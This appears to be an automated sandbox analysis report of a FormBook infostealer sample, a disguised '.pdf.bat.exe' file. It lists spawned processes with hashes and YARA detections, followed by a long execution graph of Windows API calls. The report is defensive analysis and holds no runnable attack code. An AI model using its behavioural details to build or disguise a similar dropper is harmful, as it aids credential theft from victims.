                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
                                                                Imagebase:0x400000
                                                                File size:991'098 bytes
                                                                MD5 hash:F33B6E1067BF27D4BEA237206532881E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:01:09:22
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe"
                                                                Imagebase:0xee0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:7
                                                                Start time:01:09:24
                                                                Start date:25/11/2024
                                                                Path:C:\Windows\SysWOW64\sdchange.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                Imagebase:0xf80000
                                                                File size:40'960 bytes
                                                                MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:8
                                                                Start time:01:09:38
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe"
                                                                Imagebase:0xee0000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:01:09:51
                                                                Start date:25/11/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff6bf500000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:18.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:19.6%
                                                                  Total number of Nodes:1567
                                                                  Total number of Limit Nodes:35
17 API calls 5592->5593 5594 401a0f 5593->5594 5595 401a16 lstrcmpiW 5594->5595 5596 401a28 lstrcmpW 5594->5596 5597 401a1c 5595->5597 5596->5597 5598 401000 5599 401037 BeginPaint GetClientRect 5598->5599 5602 40100c DefWindowProcW 5598->5602 5600 4010f3 5599->5600 5604 401073 CreateBrushIndirect FillRect DeleteObject 5600->5604 5605 4010fc 5600->5605 5603 401179 5602->5603 5604->5600 5606 401102 CreateFontIndirectW 5605->5606 5607 401167 EndPaint 5605->5607 5606->5607 5608 401112 6 API calls 5606->5608 5607->5603 5608->5607 5616 401503 5617 40150b 5616->5617 5619 40151e 5616->5619 5618 402c1f 17 API calls 5617->5618 5618->5619 4550 402484 4561 402c81 4550->4561 4553 402c41 17 API calls 4554 402497 4553->4554 4555 4024a2 RegQueryValueExW 4554->4555 4559 40288b 4554->4559 4556 4024c8 RegCloseKey 4555->4556 4557 4024c2 4555->4557 4556->4559 4557->4556 4566 4061cb wsprintfW 4557->4566 4562 402c41 17 API calls 4561->4562 4563 402c98 4562->4563 4564 4060f1 RegOpenKeyExW 4563->4564 4565 40248e 4564->4565 4565->4553 4566->4556 5620 402104 5621 402c41 17 API calls 5620->5621 5622 40210b 5621->5622 5623 402c41 17 API calls 5622->5623 5624 402115 5623->5624 5625 402c41 17 API calls 5624->5625 5626 40211f 5625->5626 5627 402c41 17 API calls 5626->5627 5628 402129 5627->5628 5629 402c41 17 API calls 5628->5629 5631 402133 5629->5631 5630 402172 CoCreateInstance 5635 402191 5630->5635 5631->5630 5632 402c41 17 API calls 5631->5632 5632->5630 5633 401423 24 API calls 5634 402250 5633->5634 5635->5633 5635->5634 5636 401f06 5637 402c41 17 API calls 5636->5637 5638 401f0c 5637->5638 5639 4052ec 24 API calls 5638->5639 5640 401f16 5639->5640 5641 40586d 2 API calls 5640->5641 5642 401f1c 5641->5642 5644 40288b 5642->5644 5645 40670f 5 API calls 5642->5645 5647 401f3f CloseHandle 5642->5647 5646 401f31 5645->5646 5646->5647 5649 4061cb wsprintfW 5646->5649 5647->5644 5649->5647 4658 40230c 4659 402314 4658->4659 4660 40231a 4658->4660 4661 402c41 17 API calls 4659->4661 4662 402c41 
17 API calls 4660->4662 4664 402328 4660->4664 4661->4660 4662->4664 4663 402336 4666 402c41 17 API calls 4663->4666 4664->4663 4665 402c41 17 API calls 4664->4665 4665->4663 4667 40233f WritePrivateProfileStringW 4666->4667 5650 40190c 5651 401943 5650->5651 5652 402c41 17 API calls 5651->5652 5653 401948 5652->5653 5654 405996 67 API calls 5653->5654 5655 401951 5654->5655 5656 401f8c 5657 402c41 17 API calls 5656->5657 5658 401f93 5657->5658 5659 40665e 5 API calls 5658->5659 5660 401fa2 5659->5660 5661 401fbe GlobalAlloc 5660->5661 5666 402026 5660->5666 5662 401fd2 5661->5662 5661->5666 5663 40665e 5 API calls 5662->5663 5664 401fd9 5663->5664 5665 40665e 5 API calls 5664->5665 5667 401fe3 5665->5667 5667->5666 5671 4061cb wsprintfW 5667->5671 5669 402018 5672 4061cb wsprintfW 5669->5672 5671->5669 5672->5666 5673 6fbc1671 5674 6fbc1516 GlobalFree 5673->5674 5677 6fbc1689 5674->5677 5675 6fbc16cf GlobalFree 5676 6fbc16a4 5676->5675 5677->5675 5677->5676 5678 6fbc16bb VirtualFree 5677->5678 5678->5675 5679 40238e 5680 4023c1 5679->5680 5681 402396 5679->5681 5683 402c41 17 API calls 5680->5683 5682 402c81 17 API calls 5681->5682 5684 40239d 5682->5684 5685 4023c8 5683->5685 5687 402c41 17 API calls 5684->5687 5688 4023d5 5684->5688 5690 402cff 5685->5690 5689 4023ae RegDeleteValueW RegCloseKey 5687->5689 5689->5688 5691 402d13 5690->5691 5692 402d0c 5690->5692 5691->5692 5694 402d44 5691->5694 5692->5688 5695 4060f1 RegOpenKeyExW 5694->5695 5696 402d72 5695->5696 5697 402d98 RegEnumKeyW 5696->5697 5698 402daf RegCloseKey 5696->5698 5699 402dd0 RegCloseKey 5696->5699 5702 402d44 6 API calls 5696->5702 5704 402dc3 5696->5704 5697->5696 5697->5698 5700 40665e 5 API calls 5698->5700 5699->5704 5701 402dbf 5700->5701 5703 402de0 RegDeleteKeyW 5701->5703 5701->5704 5702->5696 5703->5704 5704->5692 5705 40698e 5711 406812 5705->5711 5706 40717d 5707 406893 GlobalFree 5708 40689c GlobalAlloc 5707->5708 5708->5706 5708->5711 5709 406913 GlobalAlloc 5709->5706 5709->5711 
5710 40690a GlobalFree 5710->5709 5711->5706 5711->5707 5711->5708 5711->5709 5711->5710 5712 40190f 5713 402c41 17 API calls 5712->5713 5714 401916 5713->5714 5715 4058ea MessageBoxIndirectW 5714->5715 5716 40191f 5715->5716 5717 401491 5718 4052ec 24 API calls 5717->5718 5719 401498 5718->5719 5720 401d14 5721 402c1f 17 API calls 5720->5721 5722 401d1b 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401d27 GetDlgItem 5723->5724 5725 402592 5724->5725 5733 402598 5734 4025c7 5733->5734 5735 4025ac 5733->5735 5736 4025fb 5734->5736 5737 4025cc 5734->5737 5738 402c1f 17 API calls 5735->5738 5740 402c41 17 API calls 5736->5740 5739 402c41 17 API calls 5737->5739 5745 4025b3 5738->5745 5741 4025d3 WideCharToMultiByte lstrlenA 5739->5741 5742 402602 lstrlenW 5740->5742 5741->5745 5742->5745 5743 402645 5744 40262f 5744->5743 5746 405e2c WriteFile 5744->5746 5745->5743 5745->5744 5747 405e5b 5 API calls 5745->5747 5746->5743 5747->5744 5748 6fbc10e1 5757 6fbc1111 5748->5757 5749 6fbc11d8 GlobalFree 5750 6fbc12ba 2 API calls 5750->5757 5751 6fbc11d3 5751->5749 5752 6fbc11f8 GlobalFree 5752->5757 5753 6fbc1272 2 API calls 5756 6fbc11c4 GlobalFree 5753->5756 5754 6fbc1164 GlobalAlloc 5754->5757 5755 6fbc12e1 lstrcpyW 5755->5757 5756->5757 5757->5749 5757->5750 5757->5751 5757->5752 5757->5753 5757->5754 5757->5755 5757->5756 5758 40149e 5759 4022f7 5758->5759 5760 4014ac PostQuitMessage 5758->5760 5760->5759 5761 401c1f 5762 402c1f 17 API calls 5761->5762 5763 401c26 5762->5763 5764 402c1f 17 API calls 5763->5764 5765 401c33 5764->5765 5766 401c48 5765->5766 5767 402c41 17 API calls 5765->5767 5768 401c58 5766->5768 5771 402c41 17 API calls 5766->5771 5767->5766 5769 401c63 5768->5769 5770 401caf 5768->5770 5772 402c1f 17 API calls 5769->5772 5773 402c41 17 API calls 5770->5773 5771->5768 5774 401c68 5772->5774 5775 401cb4 5773->5775 5776 402c1f 17 API calls 5774->5776 5777 402c41 17 API calls 5775->5777 5778 401c74 5776->5778 5779 401cbd FindWindowExW 5777->5779 5780 
401c81 SendMessageTimeoutW 5778->5780 5781 401c9f SendMessageW 5778->5781 5782 401cdf 5779->5782 5780->5782 5781->5782 5783 402aa0 SendMessageW 5784 402ac5 5783->5784 5785 402aba InvalidateRect 5783->5785 5785->5784 5786 402821 5787 402827 5786->5787 5788 402ac5 5787->5788 5789 40282f FindClose 5787->5789 5789->5788 5790 6fbc18dd 5791 6fbc1900 5790->5791 5792 6fbc1935 GlobalFree 5791->5792 5793 6fbc1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5791->5793 5792->5793 5794 6fbc1272 2 API calls 5793->5794 5795 6fbc1ad2 GlobalFree GlobalFree 5794->5795 4383 403d22 4384 403e75 4383->4384 4385 403d3a 4383->4385 4387 403ec6 4384->4387 4388 403e86 GetDlgItem GetDlgItem 4384->4388 4385->4384 4386 403d46 4385->4386 4389 403d51 SetWindowPos 4386->4389 4390 403d64 4386->4390 4392 403f20 4387->4392 4400 401389 2 API calls 4387->4400 4391 4041fb 18 API calls 4388->4391 4389->4390 4394 403d81 4390->4394 4395 403d69 ShowWindow 4390->4395 4396 403eb0 SetClassLongW 4391->4396 4445 403e70 4392->4445 4454 404247 4392->4454 4397 403da3 4394->4397 4398 403d89 DestroyWindow 4394->4398 4395->4394 4399 40140b 2 API calls 4396->4399 4402 403da8 SetWindowLongW 4397->4402 4403 403db9 4397->4403 4453 404184 4398->4453 4399->4387 4401 403ef8 4400->4401 4401->4392 4404 403efc SendMessageW 4401->4404 4402->4445 4407 403e62 4403->4407 4408 403dc5 GetDlgItem 4403->4408 4404->4445 4405 40140b 2 API calls 4443 403f32 4405->4443 4406 404186 DestroyWindow EndDialog 4406->4453 4476 404262 4407->4476 4411 403dd8 SendMessageW IsWindowEnabled 4408->4411 4412 403df5 4408->4412 4410 4041b5 ShowWindow 4410->4445 4411->4412 4411->4445 4414 403e02 4412->4414 4415 403e49 SendMessageW 4412->4415 4416 403e15 4412->4416 4425 403dfa 4412->4425 4413 4062a6 17 API calls 4413->4443 4414->4415 4414->4425 4415->4407 4418 403e32 4416->4418 4419 403e1d 4416->4419 4422 40140b 2 API calls 4418->4422 4470 40140b 4419->4470 4420 403e30 4420->4407 4424 403e39 4422->4424 4423 4041fb 18 API calls 4423->4443 4424->4407 
4424->4425 4473 4041d4 4425->4473 4427 403fad GetDlgItem 4428 403fc2 4427->4428 4429 403fca ShowWindow KiUserCallbackDispatcher 4427->4429 4428->4429 4460 40421d KiUserCallbackDispatcher 4429->4460 4431 403ff4 EnableWindow 4436 404008 4431->4436 4432 40400d GetSystemMenu EnableMenuItem SendMessageW 4433 40403d SendMessageW 4432->4433 4432->4436 4433->4436 4436->4432 4461 404230 SendMessageW 4436->4461 4462 403d03 4436->4462 4465 406284 lstrcpynW 4436->4465 4438 40406c lstrlenW 4439 4062a6 17 API calls 4438->4439 4440 404082 SetWindowTextW 4439->4440 4466 401389 4440->4466 4442 4040c6 DestroyWindow 4444 4040e0 CreateDialogParamW 4442->4444 4442->4453 4443->4405 4443->4406 4443->4413 4443->4423 4443->4442 4443->4445 4457 4041fb 4443->4457 4446 404113 4444->4446 4444->4453 4447 4041fb 18 API calls 4446->4447 4448 40411e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4447->4448 4449 401389 2 API calls 4448->4449 4450 404164 4449->4450 4450->4445 4451 40416c ShowWindow 4450->4451 4452 404247 SendMessageW 4451->4452 4452->4453 4453->4410 4453->4445 4455 404250 SendMessageW 4454->4455 4456 40425f 4454->4456 4455->4456 4456->4443 4458 4062a6 17 API calls 4457->4458 4459 404206 SetDlgItemTextW 4458->4459 4459->4427 4460->4431 4461->4436 4463 4062a6 17 API calls 4462->4463 4464 403d11 SetWindowTextW 4463->4464 4464->4436 4465->4438 4468 401390 4466->4468 4467 4013fe 4467->4443 4468->4467 4469 4013cb MulDiv SendMessageW 4468->4469 4469->4468 4471 401389 2 API calls 4470->4471 4472 401420 4471->4472 4472->4425 4474 4041e1 SendMessageW 4473->4474 4475 4041db 4473->4475 4474->4420 4475->4474 4477 404325 4476->4477 4478 40427a GetWindowLongW 4476->4478 4477->4445 4478->4477 4479 40428f 4478->4479 4479->4477 4480 4042bc GetSysColor 4479->4480 4481 4042bf 4479->4481 4480->4481 4482 4042c5 SetTextColor 4481->4482 4483 4042cf SetBkMode 4481->4483 4482->4483 4484 4042e7 GetSysColor 4483->4484 4485 4042ed 4483->4485 4484->4485 4486 4042f4 SetBkColor 4485->4486 4487 4042fe 
4485->4487 4486->4487 4487->4477 4488 404311 DeleteObject 4487->4488 4489 404318 CreateBrushIndirect 4487->4489 4488->4489 4489->4477 5796 4015a3 5797 402c41 17 API calls 5796->5797 5798 4015aa SetFileAttributesW 5797->5798 5799 4015bc 5798->5799 5800 6fbc16d8 5801 6fbc1707 5800->5801 5802 6fbc1b63 22 API calls 5801->5802 5803 6fbc170e 5802->5803 5804 6fbc1715 5803->5804 5805 6fbc1721 5803->5805 5806 6fbc1272 2 API calls 5804->5806 5807 6fbc1748 5805->5807 5808 6fbc172b 5805->5808 5809 6fbc171f 5806->5809 5811 6fbc174e 5807->5811 5812 6fbc1772 5807->5812 5810 6fbc153d 3 API calls 5808->5810 5814 6fbc1730 5810->5814 5815 6fbc15b4 3 API calls 5811->5815 5813 6fbc153d 3 API calls 5812->5813 5813->5809 5816 6fbc15b4 3 API calls 5814->5816 5817 6fbc1753 5815->5817 5819 6fbc1736 5816->5819 5818 6fbc1272 2 API calls 5817->5818 5820 6fbc1759 GlobalFree 5818->5820 5821 6fbc1272 2 API calls 5819->5821 5820->5809 5822 6fbc176d GlobalFree 5820->5822 5823 6fbc173c GlobalFree 5821->5823 5822->5809 5823->5809 5824 6fbc1058 5826 6fbc1074 5824->5826 5825 6fbc10dd 5826->5825 5827 6fbc1092 5826->5827 5828 6fbc1516 GlobalFree 5826->5828 5829 6fbc1516 GlobalFree 5827->5829 5828->5827 5830 6fbc10a2 5829->5830 5831 6fbc10a9 GlobalSize 5830->5831 5832 6fbc10b2 5830->5832 5831->5832 5833 6fbc10c7 5832->5833 5834 6fbc10b6 GlobalAlloc 5832->5834 5836 6fbc10d2 GlobalFree 5833->5836 5835 6fbc153d 3 API calls 5834->5835 5835->5833 5836->5825 5837 4046a5 5838 4046b5 5837->5838 5839 4046db 5837->5839 5840 4041fb 18 API calls 5838->5840 5841 404262 8 API calls 5839->5841 5842 4046c2 SetDlgItemTextW 5840->5842 5843 4046e7 5841->5843 5842->5839 5844 4029a8 5845 402c1f 17 API calls 5844->5845 5846 4029ae 5845->5846 5847 4029d5 5846->5847 5848 4029ee 5846->5848 5853 40288b 5846->5853 5849 4029da 5847->5849 5857 4029eb 5847->5857 5850 402a08 5848->5850 5851 4029f8 5848->5851 5858 406284 lstrcpynW 5849->5858 5852 4062a6 17 API calls 5850->5852 5854 402c1f 17 API calls 5851->5854 5852->5857 5854->5857 
5857->5853 5859 4061cb wsprintfW 5857->5859 5858->5853 5859->5853 4602 40542b 4603 4055d5 4602->4603 4604 40544c GetDlgItem GetDlgItem GetDlgItem 4602->4604 4606 405606 4603->4606 4607 4055de GetDlgItem CreateThread CloseHandle 4603->4607 4648 404230 SendMessageW 4604->4648 4609 405631 4606->4609 4612 405656 4606->4612 4613 40561d ShowWindow ShowWindow 4606->4613 4607->4606 4651 4053bf OleInitialize 4607->4651 4608 4054bc 4617 4054c3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4608->4617 4610 405691 4609->4610 4611 40563d 4609->4611 4610->4612 4625 40569f SendMessageW 4610->4625 4614 405645 4611->4614 4615 40566b ShowWindow 4611->4615 4616 404262 8 API calls 4612->4616 4650 404230 SendMessageW 4613->4650 4619 4041d4 SendMessageW 4614->4619 4621 40568b 4615->4621 4622 40567d 4615->4622 4620 405664 4616->4620 4623 405531 4617->4623 4624 405515 SendMessageW SendMessageW 4617->4624 4619->4612 4627 4041d4 SendMessageW 4621->4627 4626 4052ec 24 API calls 4622->4626 4628 405544 4623->4628 4629 405536 SendMessageW 4623->4629 4624->4623 4625->4620 4630 4056b8 CreatePopupMenu 4625->4630 4626->4621 4627->4610 4632 4041fb 18 API calls 4628->4632 4629->4628 4631 4062a6 17 API calls 4630->4631 4633 4056c8 AppendMenuW 4631->4633 4634 405554 4632->4634 4635 4056e5 GetWindowRect 4633->4635 4636 4056f8 TrackPopupMenu 4633->4636 4637 405591 GetDlgItem SendMessageW 4634->4637 4638 40555d ShowWindow 4634->4638 4635->4636 4636->4620 4639 405713 4636->4639 4637->4620 4642 4055b8 SendMessageW SendMessageW 4637->4642 4640 405580 4638->4640 4641 405573 ShowWindow 4638->4641 4643 40572f SendMessageW 4639->4643 4649 404230 SendMessageW 4640->4649 4641->4640 4642->4620 4643->4643 4644 40574c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4643->4644 4646 405771 SendMessageW 4644->4646 4646->4646 4647 40579a GlobalUnlock SetClipboardData CloseClipboard 4646->4647 4647->4620 4648->4608 4649->4637 4650->4609 4652 404247 SendMessageW 4651->4652 4653 4053e2 4652->4653 4656 401389 2 
API calls 4653->4656 4657 405409 4653->4657 4654 404247 SendMessageW 4655 40541b OleUninitialize 4654->4655 4656->4653 4657->4654 5867 4028ad 5868 402c41 17 API calls 5867->5868 5870 4028bb 5868->5870 5869 4028d1 5872 405d55 2 API calls 5869->5872 5870->5869 5871 402c41 17 API calls 5870->5871 5871->5869 5873 4028d7 5872->5873 5895 405d7a GetFileAttributesW CreateFileW 5873->5895 5875 4028e4 5876 4028f0 GlobalAlloc 5875->5876 5877 402987 5875->5877 5878 402909 5876->5878 5879 40297e CloseHandle 5876->5879 5880 4029a2 5877->5880 5881 40298f DeleteFileW 5877->5881 5896 403311 SetFilePointer 5878->5896 5879->5877 5881->5880 5883 40290f 5884 4032fb ReadFile 5883->5884 5885 402918 GlobalAlloc 5884->5885 5886 402928 5885->5886 5887 40295c 5885->5887 5889 403116 35 API calls 5886->5889 5888 405e2c WriteFile 5887->5888 5890 402968 GlobalFree 5888->5890 5894 402935 5889->5894 5891 403116 35 API calls 5890->5891 5892 40297b 5891->5892 5892->5879 5893 402953 GlobalFree 5893->5887 5894->5893 5895->5875 5896->5883 5897 401a30 5898 402c41 17 API calls 5897->5898 5899 401a39 ExpandEnvironmentStringsW 5898->5899 5900 401a4d 5899->5900 5902 401a60 5899->5902 5901 401a52 lstrcmpW 5900->5901 5900->5902 5901->5902 5903 404331 lstrcpynW lstrlenW 4723 402032 4724 402044 4723->4724 4725 4020f6 4723->4725 4726 402c41 17 API calls 4724->4726 4727 401423 24 API calls 4725->4727 4728 40204b 4726->4728 4734 402250 4727->4734 4729 402c41 17 API calls 4728->4729 4730 402054 4729->4730 4731 40206a LoadLibraryExW 4730->4731 4732 40205c GetModuleHandleW 4730->4732 4731->4725 4733 40207b 4731->4733 4732->4731 4732->4733 4746 4066cd WideCharToMultiByte 4733->4746 4737 4020c5 4739 4052ec 24 API calls 4737->4739 4738 40208c 4740 402094 4738->4740 4741 4020ab 4738->4741 4742 40209c 4739->4742 4743 401423 24 API calls 4740->4743 4749 6fbc177b 4741->4749 4742->4734 4744 4020e8 FreeLibrary 4742->4744 4743->4742 4744->4734 4747 4066f7 GetProcAddress 4746->4747 4748 402086 4746->4748 4747->4748 4748->4737 
4748->4738 4750 6fbc17ae 4749->4750 4791 6fbc1b63 4750->4791 4752 6fbc17b5 4753 6fbc18da 4752->4753 4754 6fbc17cd 4752->4754 4755 6fbc17c6 4752->4755 4753->4742 4823 6fbc2398 4754->4823 4839 6fbc2356 4755->4839 4760 6fbc17fc 4775 6fbc17f2 4760->4775 4849 6fbc2d2f 4760->4849 4761 6fbc17e3 4765 6fbc17e9 4761->4765 4769 6fbc17f4 4761->4769 4762 6fbc1831 4766 6fbc1837 4762->4766 4767 6fbc1882 4762->4767 4763 6fbc1813 4852 6fbc256d 4763->4852 4765->4775 4833 6fbc2a74 4765->4833 4871 6fbc15c6 4766->4871 4773 6fbc256d 10 API calls 4767->4773 4768 6fbc1819 4863 6fbc15b4 4768->4863 4843 6fbc2728 4769->4843 4778 6fbc1873 4773->4778 4775->4762 4775->4763 4782 6fbc18c9 4778->4782 4878 6fbc2530 4778->4878 4780 6fbc17fa 4780->4775 4781 6fbc256d 10 API calls 4781->4778 4782->4753 4786 6fbc18d3 GlobalFree 4782->4786 4786->4753 4788 6fbc18b5 4788->4782 4882 6fbc153d wsprintfW 4788->4882 4789 6fbc18ae FreeLibrary 4789->4788 4885 6fbc121b GlobalAlloc 4791->4885 4793 6fbc1b87 4886 6fbc121b GlobalAlloc 4793->4886 4795 6fbc1dad GlobalFree GlobalFree GlobalFree 4796 6fbc1dca 4795->4796 4813 6fbc1e14 4795->4813 4797 6fbc2196 4796->4797 4804 6fbc1ddf 4796->4804 4796->4813 4799 6fbc21b8 GetModuleHandleW 4797->4799 4797->4813 4798 6fbc1c68 GlobalAlloc 4812 6fbc1b92 4798->4812 4801 6fbc21de 4799->4801 4802 6fbc21c9 LoadLibraryW 4799->4802 4800 6fbc1cd1 GlobalFree 4800->4812 4893 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4801->4893 4802->4801 4802->4813 4803 6fbc1cb3 lstrcpyW 4806 6fbc1cbd lstrcpyW 4803->4806 4804->4813 4889 6fbc122c 4804->4889 4806->4812 4807 6fbc2230 4809 6fbc223d lstrlenW 4807->4809 4807->4813 4894 6fbc1621 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4809->4894 4810 6fbc2068 4892 6fbc121b GlobalAlloc 4810->4892 4812->4795 4812->4798 4812->4800 4812->4803 4812->4806 4812->4810 4812->4813 4816 6fbc20f0 4812->4816 4818 6fbc1fa9 GlobalFree 4812->4818 4819 6fbc122c 2 API calls 4812->4819 4887 6fbc158f 
GlobalSize GlobalAlloc 4812->4887 4813->4752 4814 6fbc21f0 4814->4807 4821 6fbc221a GetProcAddress 4814->4821 4816->4813 4817 6fbc2138 lstrcpyW 4816->4817 4817->4813 4818->4812 4819->4812 4821->4807 4822 6fbc2071 4822->4752 4824 6fbc23b0 4823->4824 4826 6fbc24d9 GlobalFree 4824->4826 4828 6fbc2458 GlobalAlloc WideCharToMultiByte 4824->4828 4829 6fbc2483 GlobalAlloc 4824->4829 4830 6fbc122c GlobalAlloc lstrcpynW 4824->4830 4831 6fbc249a 4824->4831 4896 6fbc12ba 4824->4896 4826->4824 4827 6fbc17d3 4826->4827 4827->4760 4827->4761 4827->4775 4828->4826 4829->4831 4830->4824 4831->4826 4900 6fbc26bc 4831->4900 4835 6fbc2a86 4833->4835 4834 6fbc2b2b CreateFileA 4836 6fbc2b49 4834->4836 4835->4834 4837 6fbc2c3a GetLastError 4836->4837 4838 6fbc2c45 4836->4838 4837->4838 4838->4775 4840 6fbc236b 4839->4840 4841 6fbc17cc 4840->4841 4842 6fbc2376 GlobalAlloc 4840->4842 4841->4754 4842->4840 4847 6fbc2758 4843->4847 4844 6fbc2806 4846 6fbc280c GlobalSize 4844->4846 4848 6fbc2816 4844->4848 4845 6fbc27f3 GlobalAlloc 4845->4848 4846->4848 4847->4844 4847->4845 4848->4780 4850 6fbc2d3a 4849->4850 4851 6fbc2d7a GlobalFree 4850->4851 4903 6fbc121b GlobalAlloc 4852->4903 4854 6fbc25f0 MultiByteToWideChar 4861 6fbc2577 4854->4861 4855 6fbc2612 StringFromGUID2 4855->4861 4856 6fbc2623 lstrcpynW 4856->4861 4857 6fbc2636 wsprintfW 4857->4861 4858 6fbc265a GlobalFree 4858->4861 4859 6fbc268f GlobalFree 4859->4768 4860 6fbc1272 2 API calls 4860->4861 4861->4854 4861->4855 4861->4856 4861->4857 4861->4858 4861->4859 4861->4860 4904 6fbc12e1 4861->4904 4908 6fbc121b GlobalAlloc 4863->4908 4865 6fbc15b9 4866 6fbc15c6 2 API calls 4865->4866 4867 6fbc15c3 4866->4867 4868 6fbc1272 4867->4868 4869 6fbc127b GlobalAlloc lstrcpynW 4868->4869 4870 6fbc12b5 GlobalFree 4868->4870 4869->4870 4870->4778 4872 6fbc15e4 4871->4872 4873 6fbc15d6 lstrcpyW 4871->4873 4872->4873 4876 6fbc15f0 4872->4876 4875 6fbc161d 4873->4875 4875->4781 4876->4875 4877 6fbc160d wsprintfW 4876->4877 4877->4875 4879 6fbc253e 
4878->4879 4881 6fbc1895 4878->4881 4880 6fbc255a GlobalFree 4879->4880 4879->4881 4880->4879 4881->4788 4881->4789 4883 6fbc1272 2 API calls 4882->4883 4884 6fbc155e 4883->4884 4884->4782 4885->4793 4886->4812 4888 6fbc15ad 4887->4888 4888->4812 4895 6fbc121b GlobalAlloc 4889->4895 4891 6fbc123b lstrcpynW 4891->4813 4892->4822 4893->4814 4894->4813 4895->4891 4897 6fbc12c1 4896->4897 4898 6fbc122c 2 API calls 4897->4898 4899 6fbc12df 4898->4899 4899->4824 4901 6fbc26ca VirtualAlloc 4900->4901 4902 6fbc2720 4900->4902 4901->4902 4902->4831 4903->4861 4905 6fbc130c 4904->4905 4906 6fbc12ea 4904->4906 4905->4861 4906->4905 4907 6fbc12f0 lstrcpyW 4906->4907 4907->4905 4908->4865 5904 403932 5905 40393d 5904->5905 5906 403941 5905->5906 5907 403944 GlobalAlloc 5905->5907 5907->5906 5913 6fbc2c4f 5914 6fbc2c67 5913->5914 5915 6fbc158f 2 API calls 5914->5915 5916 6fbc2c82 5915->5916 5917 402a35 5918 402c1f 17 API calls 5917->5918 5919 402a3b 5918->5919 5920 402a72 5919->5920 5922 40288b 5919->5922 5923 402a4d 5919->5923 5921 4062a6 17 API calls 5920->5921 5920->5922 5921->5922 5923->5922 5925 4061cb wsprintfW 5923->5925 5925->5922 5926 401735 5927 402c41 17 API calls 5926->5927 5928 40173c SearchPathW 5927->5928 5929 4029e6 5928->5929 5930 401757 5928->5930 5930->5929 5932 406284 lstrcpynW 5930->5932 5932->5929 5933 4014b8 5934 4014be 5933->5934 5935 401389 2 API calls 5934->5935 5936 4014c6 5935->5936 5937 401db9 GetDC 5938 402c1f 17 API calls 5937->5938 5939 401dcb GetDeviceCaps MulDiv ReleaseDC 5938->5939 5940 402c1f 17 API calls 5939->5940 5941 401dfc 5940->5941 5942 4062a6 17 API calls 5941->5942 5943 401e39 CreateFontIndirectW 5942->5943 5944 402592 5943->5944 5945 4043ba 5946 4043d2 5945->5946 5950 4044ec 5945->5950 5951 4041fb 18 API calls 5946->5951 5947 404556 5948 404620 